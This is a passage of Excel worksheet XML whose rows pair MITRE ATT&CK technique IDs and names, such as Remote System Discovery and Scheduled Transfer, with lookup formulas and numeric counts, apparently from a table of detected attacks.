      <c r="AY5" s="322">
        <v>0</v>
      </c>
      <c r="AZ5" s="4">
        <v>0</v>
      </c>
      <c r="BA5" s="16">
        <v>0</v>
      </c>
      <c r="BB5" s="394">
        <v>0</v>
      </c>
      <c r="BC5" s="292">
        <v>32</v>
      </c>
      <c r="BD5" s="322">
        <v>8</v>
      </c>
      <c r="BE5" s="322">
        <v>0</v>
      </c>
      <c r="BF5" s="12">
        <v>5</v>
      </c>
      <c r="BG5" s="13">
        <v>1</v>
      </c>
      <c r="BH5" s="394">
        <v>3</v>
      </c>
      <c r="BI5" s="292">
        <v>4</v>
      </c>
      <c r="BJ5" s="322">
        <v>2</v>
      </c>
      <c r="BK5" s="322">
        <v>0</v>
      </c>
      <c r="BL5" s="12">
        <v>1</v>
      </c>
      <c r="BM5" s="13">
        <v>1</v>
      </c>
      <c r="BN5" s="394">
        <v>2</v>
      </c>
      <c r="BO5" s="292">
        <v>15</v>
      </c>
      <c r="BP5" s="322">
        <v>10</v>
      </c>
      <c r="BQ5" s="322">
        <v>0</v>
      </c>
      <c r="BR5" s="12">
        <v>1</v>
      </c>
      <c r="BS5" s="12">
        <v>6</v>
      </c>
      <c r="BT5" s="13">
        <v>1</v>
      </c>
      <c r="BU5" s="394">
        <v>5</v>
      </c>
      <c r="BV5" s="292">
        <v>2</v>
      </c>
      <c r="BW5" s="322">
        <v>2</v>
      </c>
      <c r="BX5" s="322">
        <v>0</v>
      </c>
      <c r="BY5" s="12">
        <v>1</v>
      </c>
      <c r="BZ5" s="13">
        <v>1</v>
      </c>
      <c r="CA5" s="394">
        <v>2</v>
      </c>
      <c r="CB5" s="292">
        <v>13</v>
      </c>
      <c r="CC5" s="322">
        <v>5</v>
      </c>
      <c r="CD5" s="322">
        <v>0</v>
      </c>
      <c r="CE5" s="12">
        <v>1</v>
      </c>
      <c r="CF5" s="12">
        <v>2</v>
      </c>
      <c r="CG5" s="13">
        <v>1</v>
      </c>
      <c r="CH5" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:93" ht="15" customHeight="1">
      <c r="A6" s="4">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="B6" s="4" t="str">
        <f>IFERROR(VLOOKUP(A6,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1011</v>
      </c>
      <c r="C6" s="493" t="str">
        <f>IFERROR(VLOOKUP(B6,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
      <c r="D6" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B6)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E6" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F6" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="G6" s="292">
        <v>1</v>
      </c>
      <c r="H6" s="322">
        <v>1</v>
      </c>
      <c r="I6" s="322">
        <v>0</v>
      </c>
      <c r="J6" s="12">
        <v>1</v>
      </c>
      <c r="K6" s="13">
        <v>1</v>
      </c>
      <c r="L6" s="394">
        <v>1</v>
      </c>
      <c r="M6" s="322">
        <v>0</v>
      </c>
      <c r="N6" s="322">
        <v>0</v>
      </c>
      <c r="O6" s="322">
        <v>0</v>
      </c>
      <c r="P6" s="12">
        <v>0</v>
      </c>
      <c r="Q6" s="13">
        <v>0</v>
      </c>
      <c r="R6" s="394">
        <v>0</v>
      </c>
      <c r="S6" s="292">
        <v>1</v>
      </c>
      <c r="T6" s="322">
        <v>1</v>
      </c>
      <c r="U6" s="322">
        <v>0</v>
      </c>
      <c r="V6" s="12">
        <v>1</v>
      </c>
      <c r="W6" s="13">
        <v>1</v>
      </c>
      <c r="X6" s="394">
        <v>1</v>
      </c>
      <c r="Y6" s="392">
        <v>1</v>
      </c>
      <c r="Z6" s="392">
        <v>1</v>
      </c>
      <c r="AA6" s="322">
        <v>0</v>
      </c>
      <c r="AB6" s="392">
        <v>1</v>
      </c>
      <c r="AC6" s="16">
        <v>1</v>
      </c>
      <c r="AD6" s="394">
        <v>1</v>
      </c>
      <c r="AE6" s="392">
        <v>4</v>
      </c>
      <c r="AF6" s="392">
        <v>2</v>
      </c>
      <c r="AG6" s="322">
        <v>0</v>
      </c>
      <c r="AH6" s="392">
        <v>2</v>
      </c>
      <c r="AI6" s="16">
        <v>1</v>
      </c>
      <c r="AJ6" s="394">
        <v>1</v>
      </c>
      <c r="AK6" s="392">
        <v>5</v>
      </c>
      <c r="AL6" s="392">
        <v>3</v>
      </c>
      <c r="AM6" s="322">
        <v>0</v>
      </c>
      <c r="AN6" s="392">
        <v>3</v>
      </c>
      <c r="AO6" s="16">
        <v>1</v>
      </c>
      <c r="AP6" s="394">
        <v>1</v>
      </c>
      <c r="AQ6" s="292">
        <v>0</v>
      </c>
      <c r="AR6" s="322">
        <v>0</v>
      </c>
      <c r="AS6" s="322">
        <v>0</v>
      </c>
      <c r="AT6" s="12">
        <v>0</v>
      </c>
      <c r="AU6" s="13">
        <v>0</v>
      </c>
      <c r="AV6" s="394">
        <v>0</v>
      </c>
      <c r="AW6" s="392">
        <v>0</v>
      </c>
      <c r="AX6" s="392">
        <v>0</v>
      </c>
      <c r="AY6" s="322">
        <v>0</v>
      </c>
      <c r="AZ6" s="4">
        <v>0</v>
      </c>
      <c r="BA6" s="16">
        <v>0</v>
      </c>
      <c r="BB6" s="394">
        <v>0</v>
      </c>
      <c r="BC6" s="292">
        <v>1</v>
      </c>
      <c r="BD6" s="322">
        <v>1</v>
      </c>
      <c r="BE6" s="322">
        <v>0</v>
      </c>
      <c r="BF6" s="12">
        <v>1</v>
      </c>
      <c r="BG6" s="13">
        <v>1</v>
      </c>
      <c r="BH6" s="394">
        <v>1</v>
      </c>
      <c r="BI6" s="292">
        <v>0</v>
      </c>
      <c r="BJ6" s="322">
        <v>0</v>
      </c>
      <c r="BK6" s="322">
        <v>0</v>
      </c>
      <c r="BL6" s="12">
        <v>0</v>
      </c>
      <c r="BM6" s="13">
        <v>0</v>
      </c>
      <c r="BN6" s="394">
        <v>0</v>
      </c>
      <c r="BO6" s="292">
        <v>0</v>
      </c>
      <c r="BP6" s="322">
        <v>0</v>
      </c>
      <c r="BQ6" s="322">
        <v>0</v>
      </c>
      <c r="BR6" s="12">
        <v>0</v>
      </c>
      <c r="BS6" s="12">
        <v>0</v>
      </c>
      <c r="BT6" s="13">
        <v>0</v>
      </c>
      <c r="BU6" s="394">
        <v>0</v>
      </c>
      <c r="BV6" s="292">
        <v>0</v>
      </c>
      <c r="BW6" s="322">
        <v>0</v>
      </c>
      <c r="BX6" s="322">
        <v>0</v>
      </c>
      <c r="BY6" s="12">
        <v>0</v>
      </c>
      <c r="BZ6" s="13">
        <v>0</v>
      </c>
      <c r="CA6" s="394">
        <v>0</v>
      </c>
      <c r="CB6" s="292">
        <v>0</v>
      </c>
      <c r="CC6" s="322">
        <v>0</v>
      </c>
      <c r="CD6" s="322">
        <v>0</v>
      </c>
      <c r="CE6" s="12">
        <v>0</v>
      </c>
      <c r="CF6" s="12">
        <v>0</v>
      </c>
      <c r="CG6" s="13">
        <v>0</v>
      </c>
      <c r="CH6" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:93" ht="15" customHeight="1">
      <c r="A7" s="4">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="B7" s="4" t="str">
        <f>IFERROR(VLOOKUP(A7,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1018</v>
      </c>
      <c r="C7" s="493" t="str">
        <f>IFERROR(VLOOKUP(B7,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="D7" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B7)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E7" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1002</v>
      </c>
      <c r="F7" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (1002)</v>
      </c>
      <c r="G7" s="292">
        <v>0</v>
      </c>
      <c r="H7" s="322">
        <v>0</v>
      </c>
      <c r="I7" s="322">
        <v>0</v>
      </c>
      <c r="J7" s="12">
        <v>0</v>
      </c>
      <c r="K7" s="13">
        <v>0</v>
      </c>
      <c r="L7" s="394">
        <v>0</v>
      </c>
      <c r="M7" s="322">
        <v>6</v>
      </c>
      <c r="N7" s="322">
        <v>6</v>
      </c>
      <c r="O7" s="322">
        <v>0</v>
      </c>
      <c r="P7" s="12">
        <v>6</v>
      </c>
      <c r="Q7" s="13">
        <v>1</v>
      </c>
      <c r="R7" s="394">
        <v>6</v>
      </c>
      <c r="S7" s="292">
        <v>6</v>
      </c>
      <c r="T7" s="322">
        <v>6</v>
      </c>
      <c r="U7" s="322">
        <v>0</v>
      </c>
      <c r="V7" s="12">
        <v>6</v>
      </c>
      <c r="W7" s="13">
        <v>1</v>
      </c>
      <c r="X7" s="394">
        <v>6</v>
      </c>
      <c r="Y7" s="392">
        <v>2</v>
      </c>
      <c r="Z7" s="392">
        <v>2</v>
      </c>
      <c r="AA7" s="322">
        <v>0</v>
      </c>
      <c r="AB7" s="392">
        <v>2</v>
      </c>
      <c r="AC7" s="16">
        <v>1</v>
      </c>
      <c r="AD7" s="394">
        <v>2</v>
      </c>
      <c r="AE7" s="392">
        <v>11</v>
      </c>
      <c r="AF7" s="392">
        <v>9</v>
      </c>
      <c r="AG7" s="322">
        <v>0</v>
      </c>
      <c r="AH7" s="392">
        <v>9</v>
      </c>
      <c r="AI7" s="16">
        <v>1</v>
      </c>
      <c r="AJ7" s="394">
        <v>8</v>
      </c>
      <c r="AK7" s="392">
        <v>13</v>
      </c>
      <c r="AL7" s="392">
        <v>11</v>
      </c>
      <c r="AM7" s="322">
        <v>0</v>
      </c>
      <c r="AN7" s="392">
        <v>11</v>
      </c>
      <c r="AO7" s="16">
        <v>1</v>
      </c>
      <c r="AP7" s="394">
        <v>9</v>
      </c>
      <c r="AQ7" s="292">
        <v>0</v>
      </c>
      <c r="AR7" s="322">
        <v>0</v>
      </c>
      <c r="AS7" s="322">
        <v>0</v>
      </c>
      <c r="AT7" s="12">
        <v>0</v>
      </c>
      <c r="AU7" s="13">
        <v>0</v>
      </c>
      <c r="AV7" s="394">
        <v>0</v>
      </c>
      <c r="AW7" s="392">
        <v>2</v>
      </c>
      <c r="AX7" s="392">
        <v>2</v>
      </c>
      <c r="AY7" s="322">
        <v>0</v>
      </c>
      <c r="AZ7" s="4">
        <v>2</v>
      </c>
      <c r="BA7" s="16">
        <v>1</v>
      </c>
      <c r="BB7" s="394">
        <v>2</v>
      </c>
      <c r="BC7" s="292">
        <v>8</v>
      </c>
      <c r="BD7" s="322">
        <v>8</v>
      </c>
      <c r="BE7" s="322">
        <v>0</v>
      </c>
      <c r="BF7" s="12">
        <v>8</v>
      </c>
      <c r="BG7" s="13">
        <v>1</v>
      </c>
      <c r="BH7" s="394">
        <v>8</v>
      </c>
      <c r="BI7" s="292">
        <v>6</v>
      </c>
      <c r="BJ7" s="322">
        <v>6</v>
      </c>
      <c r="BK7" s="322">
        <v>0</v>
      </c>
      <c r="BL7" s="12">
        <v>1</v>
      </c>
      <c r="BM7" s="13">
        <v>1</v>
      </c>
      <c r="BN7" s="394">
        <v>6</v>
      </c>
      <c r="BO7" s="292">
        <v>6</v>
      </c>
      <c r="BP7" s="322">
        <v>6</v>
      </c>
      <c r="BQ7" s="322">
        <v>0</v>
      </c>
      <c r="BR7" s="12">
        <v>1</v>
      </c>
      <c r="BS7" s="12">
        <v>0</v>
      </c>
      <c r="BT7" s="13">
        <v>1</v>
      </c>
      <c r="BU7" s="394">
        <v>6</v>
      </c>
      <c r="BV7" s="292">
        <v>0</v>
      </c>
      <c r="BW7" s="322">
        <v>0</v>
      </c>
      <c r="BX7" s="322">
        <v>0</v>
      </c>
      <c r="BY7" s="12">
        <v>0</v>
      </c>
      <c r="BZ7" s="13">
        <v>0</v>
      </c>
      <c r="CA7" s="394">
        <v>0</v>
      </c>
      <c r="CB7" s="292">
        <v>0</v>
      </c>
      <c r="CC7" s="322">
        <v>0</v>
      </c>
      <c r="CD7" s="322">
        <v>0</v>
      </c>
      <c r="CE7" s="12">
        <v>0</v>
      </c>
      <c r="CF7" s="12">
        <v>0</v>
      </c>
      <c r="CG7" s="13">
        <v>0</v>
      </c>
      <c r="CH7" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:93" ht="15" customHeight="1">
      <c r="A8" s="4">
        <f t="shared" si="0"/>
        <v>6</v>
      </c>
      <c r="B8" s="4" t="str">
        <f>IFERROR(VLOOKUP(A8,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1020</v>
      </c>
      <c r="C8" s="493" t="str">
        <f>IFERROR(VLOOKUP(B8,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Automated Exfiltration</v>
      </c>
      <c r="D8" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B8)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E8" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>26</v>
      </c>
      <c r="F8" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (26)</v>
      </c>
      <c r="G8" s="292">
        <v>11</v>
      </c>
      <c r="H8" s="322">
        <v>2</v>
      </c>
      <c r="I8" s="322">
        <v>0</v>
      </c>
      <c r="J8" s="12">
        <v>1</v>
      </c>
      <c r="K8" s="13">
        <v>1</v>
      </c>
      <c r="L8" s="394">
        <v>2</v>
      </c>
      <c r="M8" s="322">
        <v>6</v>
      </c>
      <c r="N8" s="322">
        <v>1</v>
      </c>
      <c r="O8" s="322">
        <v>0</v>
      </c>
      <c r="P8" s="12">
        <v>1</v>
      </c>
      <c r="Q8" s="13">
        <v>1</v>
      </c>
      <c r="R8" s="394">
        <v>1</v>
      </c>
      <c r="S8" s="292">
        <v>17</v>
      </c>
      <c r="T8" s="322">
        <v>3</v>
      </c>
      <c r="U8" s="322">
        <v>0</v>
      </c>
      <c r="V8" s="12">
        <v>2</v>
      </c>
      <c r="W8" s="13">
        <v>1</v>
      </c>
      <c r="X8" s="394">
        <v>3</v>
      </c>
      <c r="Y8" s="392">
        <v>39</v>
      </c>
      <c r="Z8" s="392">
        <v>3</v>
      </c>
      <c r="AA8" s="322">
        <v>0</v>
      </c>
      <c r="AB8" s="392">
        <v>2</v>
      </c>
      <c r="AC8" s="16">
        <v>1</v>
      </c>
      <c r="AD8" s="394">
        <v>3</v>
      </c>
      <c r="AE8" s="392">
        <v>16</v>
      </c>
      <c r="AF8" s="392">
        <v>9</v>
      </c>
      <c r="AG8" s="322">
        <v>0</v>
      </c>
      <c r="AH8" s="392">
        <v>3</v>
      </c>
      <c r="AI8" s="16">
        <v>1</v>
      </c>
      <c r="AJ8" s="394">
        <v>7</v>
      </c>
      <c r="AK8" s="392">
        <v>55</v>
      </c>
      <c r="AL8" s="392">
        <v>12</v>
      </c>
      <c r="AM8" s="322">
        <v>0</v>
      </c>
      <c r="AN8" s="392">
        <v>5</v>
      </c>
      <c r="AO8" s="16">
        <v>1</v>
      </c>
      <c r="AP8" s="394">
        <v>9</v>
      </c>
      <c r="AQ8" s="292">
        <v>0</v>
      </c>
      <c r="AR8" s="322">
        <v>0</v>
      </c>
      <c r="AS8" s="322">
        <v>0</v>
      </c>
      <c r="AT8" s="12">
        <v>0</v>
      </c>
      <c r="AU8" s="13">
        <v>0</v>
      </c>
      <c r="AV8" s="394">
        <v>0</v>
      </c>
      <c r="AW8" s="392">
        <v>28</v>
      </c>
      <c r="AX8" s="392">
        <v>1</v>
      </c>
      <c r="AY8" s="322">
        <v>0</v>
      </c>
      <c r="AZ8" s="4">
        <v>1</v>
      </c>
      <c r="BA8" s="16">
        <v>1</v>
      </c>
      <c r="BB8" s="394">
        <v>1</v>
      </c>
      <c r="BC8" s="292">
        <v>45</v>
      </c>
      <c r="BD8" s="322">
        <v>4</v>
      </c>
      <c r="BE8" s="322">
        <v>0</v>
      </c>
      <c r="BF8" s="12">
        <v>3</v>
      </c>
      <c r="BG8" s="13">
        <v>1</v>
      </c>
      <c r="BH8" s="394">
        <v>4</v>
      </c>
      <c r="BI8" s="292">
        <v>1</v>
      </c>
      <c r="BJ8" s="322">
        <v>1</v>
      </c>
      <c r="BK8" s="322">
        <v>0</v>
      </c>
      <c r="BL8" s="12">
        <v>1</v>
      </c>
      <c r="BM8" s="13">
        <v>1</v>
      </c>
      <c r="BN8" s="394">
        <v>1</v>
      </c>
      <c r="BO8" s="292">
        <v>51</v>
      </c>
      <c r="BP8" s="322">
        <v>24</v>
      </c>
      <c r="BQ8" s="322">
        <v>0</v>
      </c>
      <c r="BR8" s="12">
        <v>1</v>
      </c>
      <c r="BS8" s="12">
        <v>4</v>
      </c>
      <c r="BT8" s="13">
        <v>1</v>
      </c>
      <c r="BU8" s="394">
        <v>23</v>
      </c>
      <c r="BV8" s="292">
        <v>0</v>
      </c>
      <c r="BW8" s="322">
        <v>0</v>
      </c>
      <c r="BX8" s="322">
        <v>0</v>
      </c>
      <c r="BY8" s="12">
        <v>0</v>
      </c>
      <c r="BZ8" s="13">
        <v>0</v>
      </c>
      <c r="CA8" s="394">
        <v>0</v>
      </c>
      <c r="CB8" s="292">
        <v>1</v>
      </c>
      <c r="CC8" s="322">
        <v>1</v>
      </c>
      <c r="CD8" s="322">
        <v>0</v>
      </c>
      <c r="CE8" s="12">
        <v>0</v>
      </c>
      <c r="CF8" s="12">
        <v>1</v>
      </c>
      <c r="CG8" s="13">
        <v>1</v>
      </c>
      <c r="CH8" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:93" ht="15" customHeight="1">
      <c r="A9" s="4">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="B9" s="4" t="str">
        <f>IFERROR(VLOOKUP(A9,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1021</v>
      </c>
      <c r="C9" s="493" t="str">
        <f>IFERROR(VLOOKUP(B9,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Services</v>
      </c>
      <c r="D9" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B9)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E9" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F9" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="G9" s="292">
        <v>3</v>
      </c>
      <c r="H9" s="322">
        <v>1</v>
      </c>
      <c r="I9" s="322">
        <v>0</v>
      </c>
      <c r="J9" s="12">
        <v>1</v>
      </c>
      <c r="K9" s="13">
        <v>1</v>
      </c>
      <c r="L9" s="394">
        <v>1</v>
      </c>
      <c r="M9" s="322">
        <v>0</v>
      </c>
      <c r="N9" s="322">
        <v>0</v>
      </c>
      <c r="O9" s="322">
        <v>0</v>
      </c>
      <c r="P9" s="12">
        <v>0</v>
      </c>
      <c r="Q9" s="13">
        <v>0</v>
      </c>
      <c r="R9" s="394">
        <v>0</v>
      </c>
      <c r="S9" s="292">
        <v>3</v>
      </c>
      <c r="T9" s="322">
        <v>1</v>
      </c>
      <c r="U9" s="322">
        <v>0</v>
      </c>
      <c r="V9" s="12">
        <v>1</v>
      </c>
      <c r="W9" s="13">
        <v>1</v>
      </c>
      <c r="X9" s="394">
        <v>1</v>
      </c>
      <c r="Y9" s="392">
        <v>4</v>
      </c>
      <c r="Z9" s="392">
        <v>2</v>
      </c>
      <c r="AA9" s="322">
        <v>0</v>
      </c>
      <c r="AB9" s="392">
        <v>2</v>
      </c>
      <c r="AC9" s="16">
        <v>1</v>
      </c>
      <c r="AD9" s="394">
        <v>1</v>
      </c>
      <c r="AE9" s="392">
        <v>4</v>
      </c>
      <c r="AF9" s="392">
        <v>2</v>
      </c>
      <c r="AG9" s="322">
        <v>0</v>
      </c>
      <c r="AH9" s="392">
        <v>2</v>
      </c>
      <c r="AI9" s="16">
        <v>1</v>
      </c>
      <c r="AJ9" s="394">
        <v>1</v>
      </c>
      <c r="AK9" s="392">
        <v>8</v>
      </c>
      <c r="AL9" s="392">
        <v>4</v>
      </c>
      <c r="AM9" s="322">
        <v>0</v>
      </c>
      <c r="AN9" s="392">
        <v>4</v>
      </c>
      <c r="AO9" s="16">
        <v>1</v>
      </c>
      <c r="AP9" s="394">
        <v>1</v>
      </c>
      <c r="AQ9" s="292">
        <v>0</v>
      </c>
      <c r="AR9" s="322">
        <v>0</v>
      </c>
      <c r="AS9" s="322">
        <v>0</v>
      </c>
      <c r="AT9" s="12">
        <v>0</v>
      </c>
      <c r="AU9" s="13">
        <v>0</v>
      </c>
      <c r="AV9" s="394">
        <v>0</v>
      </c>
      <c r="AW9" s="392">
        <v>1</v>
      </c>
      <c r="AX9" s="392">
        <v>1</v>
      </c>
      <c r="AY9" s="322">
        <v>0</v>
      </c>
      <c r="AZ9" s="4">
        <v>1</v>
      </c>
      <c r="BA9" s="16">
        <v>1</v>
      </c>
      <c r="BB9" s="394">
        <v>1</v>
      </c>
      <c r="BC9" s="292">
        <v>4</v>
      </c>
      <c r="BD9" s="322">
        <v>2</v>
      </c>
      <c r="BE9" s="322">
        <v>0</v>
      </c>
      <c r="BF9" s="12">
        <v>2</v>
      </c>
      <c r="BG9" s="13">
        <v>1</v>
      </c>
      <c r="BH9" s="394">
        <v>1</v>
      </c>
      <c r="BI9" s="292">
        <v>1</v>
      </c>
      <c r="BJ9" s="322">
        <v>1</v>
      </c>
      <c r="BK9" s="322">
        <v>0</v>
      </c>
      <c r="BL9" s="12">
        <v>1</v>
      </c>
      <c r="BM9" s="13">
        <v>1</v>
      </c>
      <c r="BN9" s="394">
        <v>1</v>
      </c>
      <c r="BO9" s="292">
        <v>2</v>
      </c>
      <c r="BP9" s="322">
        <v>2</v>
      </c>
      <c r="BQ9" s="322">
        <v>0</v>
      </c>
      <c r="BR9" s="12">
        <v>1</v>
      </c>
      <c r="BS9" s="12">
        <v>1</v>
      </c>
      <c r="BT9" s="13">
        <v>1</v>
      </c>
      <c r="BU9" s="394">
        <v>1</v>
      </c>
      <c r="BV9" s="292">
        <v>0</v>
      </c>
      <c r="BW9" s="322">
        <v>0</v>
      </c>
      <c r="BX9" s="322">
        <v>0</v>
      </c>
      <c r="BY9" s="12">
        <v>0</v>
      </c>
      <c r="BZ9" s="13">
        <v>0</v>
      </c>
      <c r="CA9" s="394">
        <v>0</v>
      </c>
      <c r="CB9" s="292">
        <v>1</v>
      </c>
      <c r="CC9" s="322">
        <v>1</v>
      </c>
      <c r="CD9" s="322">
        <v>0</v>
      </c>
      <c r="CE9" s="12">
        <v>0</v>
      </c>
      <c r="CF9" s="12">
        <v>1</v>
      </c>
      <c r="CG9" s="13">
        <v>1</v>
      </c>
      <c r="CH9" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:93" ht="15" customHeight="1">
      <c r="A10" s="4">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="B10" s="4" t="str">
        <f>IFERROR(VLOOKUP(A10,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1029</v>
      </c>
      <c r="C10" s="493" t="str">
        <f>IFERROR(VLOOKUP(B10,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Scheduled Transfer</v>
      </c>
      <c r="D10" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B10)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E10" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>9</v>
      </c>
      <c r="F10" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (9)</v>
      </c>
      <c r="G10" s="292">
        <v>5</v>
      </c>
      <c r="H10" s="322">
        <v>2</v>
      </c>
      <c r="I10" s="322">
        <v>0</v>
      </c>
      <c r="J10" s="12">
        <v>2</v>
      </c>
      <c r="K10" s="13">
        <v>1</v>
      </c>
      <c r="L10" s="394">
        <v>1</v>
      </c>
      <c r="M10" s="322">
        <v>3</v>
      </c>
      <c r="N10" s="322">
        <v>3</v>
      </c>
      <c r="O10" s="322">
        <v>0</v>
      </c>
      <c r="P10" s="12">
        <v>3</v>
      </c>
      <c r="Q10" s="13">
        <v>1</v>
      </c>
      <c r="R10" s="394">
        <v>1</v>
      </c>
      <c r="S10" s="292">
        <v>8</v>
      </c>
      <c r="T10" s="322">
        <v>5</v>
      </c>
      <c r="U10" s="322">
        <v>0</v>
      </c>
      <c r="V10" s="12">
        <v>5</v>
      </c>
      <c r="W10" s="13">
        <v>1</v>
      </c>
      <c r="X10" s="394">
        <v>2</v>
      </c>
      <c r="Y10" s="392">
        <v>63</v>
      </c>
      <c r="Z10" s="392">
        <v>8</v>
      </c>
      <c r="AA10" s="322">
        <v>0</v>
      </c>
      <c r="AB10" s="392">
        <v>4</v>
      </c>
      <c r="AC10" s="16">
        <v>1</v>
      </c>
      <c r="AD10" s="394">
        <v>7</v>
      </c>
      <c r="AE10" s="392">
        <v>7</v>
      </c>
      <c r="AF10" s="392">
        <v>5</v>
      </c>
      <c r="AG10" s="322">
        <v>0</v>
      </c>
      <c r="AH10" s="392">
        <v>5</v>
      </c>
      <c r="AI10" s="16">
        <v>1</v>
      </c>
      <c r="AJ10" s="394">
        <v>1</v>
      </c>
      <c r="AK10" s="392">
        <v>70</v>
      </c>
      <c r="AL10" s="392">
        <v>13</v>
      </c>
      <c r="AM10" s="322">
        <v>0</v>
      </c>
      <c r="AN10" s="392">
        <v>9</v>
      </c>
      <c r="AO10" s="16">
        <v>1</v>
      </c>
      <c r="AP10" s="394">
        <v>7</v>
      </c>
      <c r="AQ10" s="292">
        <v>0</v>
      </c>
      <c r="AR10" s="322">
        <v>0</v>
      </c>
      <c r="AS10" s="322">
        <v>0</v>
      </c>
      <c r="AT10" s="12">
        <v>0</v>
      </c>
      <c r="AU10" s="13">
        <v>0</v>
      </c>
      <c r="AV10" s="394">
        <v>0</v>
      </c>
      <c r="AW10" s="392">
        <v>20</v>
      </c>
      <c r="AX10" s="392">
        <v>5</v>
      </c>
      <c r="AY10" s="322">
        <v>0</v>
      </c>
      <c r="AZ10" s="4">
        <v>1</v>
      </c>
      <c r="BA10" s="16">
        <v>1</v>
      </c>
      <c r="BB10" s="394">
        <v>5</v>
      </c>
      <c r="BC10" s="292">
        <v>28</v>
      </c>
      <c r="BD10" s="322">
        <v>10</v>
      </c>
      <c r="BE10" s="322">
        <v>0</v>
      </c>
      <c r="BF10" s="12">
        <v>6</v>
      </c>
      <c r="BG10" s="13">
        <v>1</v>
      </c>
      <c r="BH10" s="394">
        <v>7</v>
      </c>
      <c r="BI10" s="292">
        <v>3</v>
      </c>
      <c r="BJ10" s="322">
        <v>2</v>
      </c>
      <c r="BK10" s="322">
        <v>0</v>
      </c>
      <c r="BL10" s="12">
        <v>2</v>
      </c>
      <c r="BM10" s="13">
        <v>1</v>
      </c>
      <c r="BN10" s="394">
        <v>2</v>
      </c>
      <c r="BO10" s="292">
        <v>10</v>
      </c>
      <c r="BP10" s="322">
        <v>9</v>
      </c>
      <c r="BQ10" s="322">
        <v>0</v>
      </c>
      <c r="BR10" s="12">
        <v>2</v>
      </c>
      <c r="BS10" s="12">
        <v>3</v>
      </c>
      <c r="BT10" s="13">
        <v>1</v>
      </c>
      <c r="BU10" s="394">
        <v>7</v>
      </c>
      <c r="BV10" s="292">
        <v>1</v>
      </c>
      <c r="BW10" s="322">
        <v>1</v>
      </c>
      <c r="BX10" s="322">
        <v>0</v>
      </c>
      <c r="BY10" s="12">
        <v>1</v>
      </c>
      <c r="BZ10" s="13">
        <v>1</v>
      </c>
      <c r="CA10" s="394">
        <v>1</v>
      </c>
      <c r="CB10" s="292">
        <v>5</v>
      </c>
      <c r="CC10" s="322">
        <v>2</v>
      </c>
      <c r="CD10" s="322">
        <v>0</v>
      </c>
      <c r="CE10" s="12">
        <v>1</v>
      </c>
      <c r="CF10" s="12">
        <v>1</v>
      </c>
      <c r="CG10" s="13">
        <v>1</v>
      </c>
      <c r="CH10" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:93" ht="15" customHeight="1">
      <c r="A11" s="4">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
